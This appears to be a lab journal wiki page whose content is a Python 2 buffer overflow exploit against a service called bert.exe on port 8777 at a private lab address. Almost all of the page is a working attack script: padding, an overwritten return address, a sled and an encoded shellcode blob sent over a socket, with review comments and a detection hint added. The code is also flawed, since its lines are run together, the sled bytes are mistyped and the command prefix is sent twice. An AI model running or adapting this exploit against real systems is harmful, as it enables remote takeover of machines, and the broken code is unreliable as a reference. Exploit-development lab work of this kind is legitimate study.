Buffer Overflow with Bert.exe - Henryisgreat/TechJournal GitHub Wiki

[image] Open port on 8777 — probably bert.exe

#! /usr/bin/python2 import socket; import sys;
# Proof-of-concept overflow payload for the service listening on TCP 8777 (the
# page's port scan attributes that port to bert.exe). Python 2 per the shebang:
# the str/bytes mix in the payload assembly below relies on Python 2 string
# semantics. `sys` is imported but never used.

# Target is a private (RFC 1918) lab address; port and command prefix belong to
# the BERT service itself. NOTE(review): the "TRUN" in the inline comment is not
# referenced anywhere else on the page — looks like a leftover from a template
# script, verify against the original write-up.
ip="192.168.0.21" port = 8777 #default TRUN port prefix = 'BERT /.:/'

# 1744 filler bytes ('A' = 0x41) followed by the 4-byte value that is placed
# where the saved return address sits (the author labels it `eip`).
offset = 'A' * 1744 eip = "\x3c\x15\x50\x43"

# sled: a repeated filler string placed before the payload bytes.
# buf: payload bytes assembled from hex escapes; the page does not say what
# they encode, so treat the blob as opaque when reading this script.
sled = "\x090" * 32 buf = b"" buf += b"\xb8\x7c\x21\xd2\xe7\xd9\xc0\xd9\x74\x24\xf4\x5f" buf += b"\x29\xc9\xb1\x52\x31\x47\x12\x03\x47\x12\x83\x93" buf += b"\xdd\x30\x12\x97\xf6\x37\xdd\x67\x07\x58\x57\x82" buf += b"\x36\x58\x03\xc7\x69\x68\x47\x85\x85\x03\x05\x3d" buf += b"\x1d\x61\x82\x32\x96\xcc\xf4\x7d\x27\x7c\xc4\x1c" buf += b"\xab\x7f\x19\xfe\x92\x4f\x6c\xff\xd3\xb2\x9d\xad" buf += b"\x8c\xb9\x30\x41\xb8\xf4\x88\xea\xf2\x19\x89\x0f" buf += b"\x42\x1b\xb8\x9e\xd8\x42\x1a\x21\x0c\xff\x13\x39" buf += b"\x51\x3a\xed\xb2\xa1\xb0\xec\x12\xf8\x39\x42\x5b" buf += b"\x34\xc8\x9a\x9c\xf3\x33\xe9\xd4\x07\xc9\xea\x23" buf += b"\x75\x15\x7e\xb7\xdd\xde\xd8\x13\xdf\x33\xbe\xd0" buf += b"\xd3\xf8\xb4\xbe\xf7\xff\x19\xb5\x0c\x8b\x9f\x19" buf += b"\x85\xcf\xbb\xbd\xcd\x94\xa2\xe4\xab\x7b\xda\xf6" buf += b"\x13\x23\x7e\x7d\xb9\x30\xf3\xdc\xd6\xf5\x3e\xde" buf += b"\x26\x92\x49\xad\x14\x3d\xe2\x39\x15\xb6\x2c\xbe" buf += b"\x5a\xed\x89\x50\xa5\x0e\xea\x79\x62\x5a\xba\x11" buf += b"\x43\xe3\x51\xe1\x6c\x36\xf5\xb1\xc2\xe9\xb6\x61" buf += b"\xa3\x59\x5f\x6b\x2c\x85\x7f\x94\xe6\xae\xea\x6f" buf += b"\x61\x11\x42\x6e\x64\xf9\x91\x70\xa4\xb0\x1c\x96" buf += b"\xc2\x52\x49\x01\x7b\xca\xd0\xd9\x1a\x13\xcf\xa4" buf += b"\x1d\x9f\xfc\x59\xd3\x68\x88\x49\x84\x98\xc7\x33" buf += b"\x03\xa6\xfd\x5b\xcf\x35\x9a\x9b\x86\x25\x35\xcc" buf += b"\xcf\x98\x4c\x98\xfd\x83\xe6\xbe\xff\x52\xc0\x7a" buf += b"\x24\xa7\xcf\x83\xa9\x93\xeb\x93\x77\x1b\xb0\xc7" buf += b"\x27\x4a\x6e\xb1\x81\x24\xc0\x6b\x58\x9a\x8a\xfb" buf += b"\x1d\xd0\x0c\x7d\x22\x3d\xfb\x61\x93\xe8\xba\x9e" buf += b"\x1c\x7d\x4b\xe7\x40\x1d\xb4\x32\xc1\x2d\xff\x1e" buf += b"\x60\xa6\xa6\xcb\x30\xab\x58\x26\x76\xd2\xda\xc2" buf += b"\x07\x21\xc2\xa7\x02\x6d\x44\x54\x7f\xfe\x21\x5a" buf += b"\x2c\xff\x63"

# NOTE(review): "6250153C" is not referenced by the code; presumably a hex
# value jotted down during analysis — confirm its meaning against the write-up.
#6250153C

# Final payload order: command prefix, filler, EIP value, sled, payload bytes.
buffer = prefix + offset + eip + sled + buf

# One TCP connection: the whole payload goes out in a single send() and the
# socket is closed without reading any reply. Detection hint: a request to this
# port that starts with the 'BERT /.:/' prefix and is followed by a long run of
# 0x41 bytes is the on-the-wire signature of this payload.
print("Fuzzing BERT with %s bytes " % len(buffer)) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect = s.connect((ip,port)) s.send((prefix+buffer)) s.close()